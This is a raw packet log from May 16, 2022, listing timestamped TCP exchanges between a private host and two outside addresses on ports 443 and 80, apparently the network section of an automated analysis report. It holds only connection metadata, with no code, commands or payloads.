May 16, 2022 10:29:36.861934900 CEST	49753	443	192.168.2.5	149.154.167.99
May 16, 2022 10:29:36.861964941 CEST	443	49753	149.154.167.99	192.168.2.5
May 16, 2022 10:29:36.944955111 CEST	443	49753	149.154.167.99	192.168.2.5
May 16, 2022 10:29:36.945156097 CEST	49753	443	192.168.2.5	149.154.167.99
May 16, 2022 10:29:37.345733881 CEST	49753	443	192.168.2.5	149.154.167.99
May 16, 2022 10:29:37.345772982 CEST	443	49753	149.154.167.99	192.168.2.5
May 16, 2022 10:29:37.346064091 CEST	443	49753	149.154.167.99	192.168.2.5
May 16, 2022 10:29:37.346182108 CEST	49753	443	192.168.2.5	149.154.167.99
May 16, 2022 10:29:37.350347042 CEST	49753	443	192.168.2.5	149.154.167.99
May 16, 2022 10:29:37.392502069 CEST	443	49753	149.154.167.99	192.168.2.5
May 16, 2022 10:29:37.403965950 CEST	443	49753	149.154.167.99	192.168.2.5
May 16, 2022 10:29:37.403997898 CEST	443	49753	149.154.167.99	192.168.2.5
May 16, 2022 10:29:37.404041052 CEST	443	49753	149.154.167.99	192.168.2.5
May 16, 2022 10:29:37.404098034 CEST	49753	443	192.168.2.5	149.154.167.99
May 16, 2022 10:29:37.404114962 CEST	443	49753	149.154.167.99	192.168.2.5
May 16, 2022 10:29:37.404136896 CEST	49753	443	192.168.2.5	149.154.167.99
May 16, 2022 10:29:37.404202938 CEST	49753	443	192.168.2.5	149.154.167.99
May 16, 2022 10:29:37.408384085 CEST	49753	443	192.168.2.5	149.154.167.99
May 16, 2022 10:29:37.408416986 CEST	443	49753	149.154.167.99	192.168.2.5
May 16, 2022 10:29:37.520055056 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.540235043 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.540548086 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.542433977 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.562544107 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.632414103 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.632513046 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.745793104 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.765851974 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.838203907 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.838325024 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.841936111 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.862008095 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.862175941 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.862196922 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.862210035 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.862225056 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.862282991 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.862282038 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.862301111 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.862319946 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.862329006 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.862375021 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.862376928 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.862396955 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.862453938 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.862494946 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.862530947 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.862584114 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.882395029 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.882421970 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.882452011 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.882468939 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.882558107 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.882628918 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.882770061 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.882788897 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.882805109 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.882821083 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.882838011 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.882853985 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.882870913 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.882883072 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.882895947 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.882908106 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.882920980 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.882932901 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.882945061 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.882952929 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.882956982 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.882963896 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.882968903 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.882970095 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.882982969 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.884238958 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.902890921 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.902920008 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.902935982 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.902952909 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.902967930 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.902983904 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.903002024 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.903017998 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.903098106 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.903155088 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.904334068 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.904360056 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.904376030 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.904391050 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.904408932 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.904424906 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.904438019 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.904443979 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.904463053 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.904479980 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.904495955 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.904506922 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.904514074 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.904530048 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.904546976 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.904562950 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.904573917 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.904616117 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.904628992 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.904635906 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.904652119 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.904668093 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.904669046 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.904683113 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.904695034 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.904705048 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.904844999 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.904891968 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.904942989 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.905056000 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.905095100 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.905117035 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.905124903 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.905142069 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.905155897 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.905169010 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.905185938 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.905198097 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.905215025 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.905226946 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.905249119 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.905261993 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.905278921 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.905292988 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.905309916 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.905319929 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.905339003 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.905352116 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.905369043 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.905380964 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.905404091 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.905417919 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.905446053 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.923219919 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.923257113 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.923279047 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.923296928 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.923317909 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.923338890 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.923350096 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.923360109 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.923381090 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.923389912 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.923402071 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.923422098 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.923435926 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.923443079 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.923463106 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.923475027 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.923481941 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.923502922 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.923516989 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.923521996 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.923542976 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.923547983 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.923585892 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.923633099 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.924390078 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924412966 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924432039 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924451113 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924465895 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.924470901 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924506903 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924515963 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.924529076 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924549103 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924567938 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924571037 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.924588919 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924608946 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924613953 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.924628019 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924648046 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.924649000 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924680948 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.924686909 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924709082 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924711943 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.924726963 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924747944 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924767971 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924767971 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.924787045 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924807072 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924827099 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924829960 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.924846888 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924854040 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.924868107 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924880028 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.924887896 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924909115 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924927950 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924932003 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.924948931 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924968958 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.924976110 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.924989939 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.925004959 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.925009012 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.925030947 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.925050974 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.925055027 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.925071955 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.925091982 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.925111055 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.925116062 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.925132990 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.925147057 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.925152063 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.925172091 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.925184965 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.925215960 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.925368071 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.925389051 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.925406933 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.925422907 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.925427914 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.925450087 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.925468922 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.925471067 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.925524950 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.925880909 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.925903082 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.925923109 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.925945044 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.925945044 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.925967932 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.925988913 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.925988913 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.926011086 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.926031113 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.926034927 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.926052094 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.926071882 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.926081896 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.926090956 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.926111937 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.926116943 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.926132917 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.926148891 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.926153898 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.926176071 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.926193953 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.926196098 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.926214933 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.926234961 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.926248074 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.926254034 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.926275015 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.926281929 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.926321983 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.943783998 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.943816900 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.943831921 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.943849087 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.943865061 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.943880081 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.943897009 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.943912029 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.943927050 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.943943024 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.943958044 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.943972111 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.943974972 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.943990946 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.944008112 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.944025993 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.944032907 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.944044113 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.944061041 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.944076061 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.944086075 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.944092035 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.944108009 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.944123030 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.944130898 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.944140911 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.944156885 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.944171906 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.944188118 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.944194078 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.944205999 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.944222927 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.944225073 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.944240093 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.944256067 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.944256067 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.944272995 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.944288969 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.944323063 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.944994926 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945013046 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945029974 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945045948 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945061922 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945077896 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945091963 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.945094109 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945111990 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945117950 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.945128918 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945143938 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945147991 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.945161104 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945173979 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.945175886 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945194006 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945209980 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945210934 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.945225954 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945240021 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.945242882 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945260048 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945272923 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.945274115 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945298910 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945311069 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.945314884 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945331097 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945346117 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.945348024 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945364952 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945378065 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.945380926 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945399046 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945411921 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.945415974 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945434093 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945444107 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.945451021 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945467949 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945477962 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.945485115 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945501089 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945516109 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.945518017 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945537090 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945553064 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945554972 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.945569992 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945585966 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945593119 CEST	49756	80	192.168.2.5	116.202.0.187
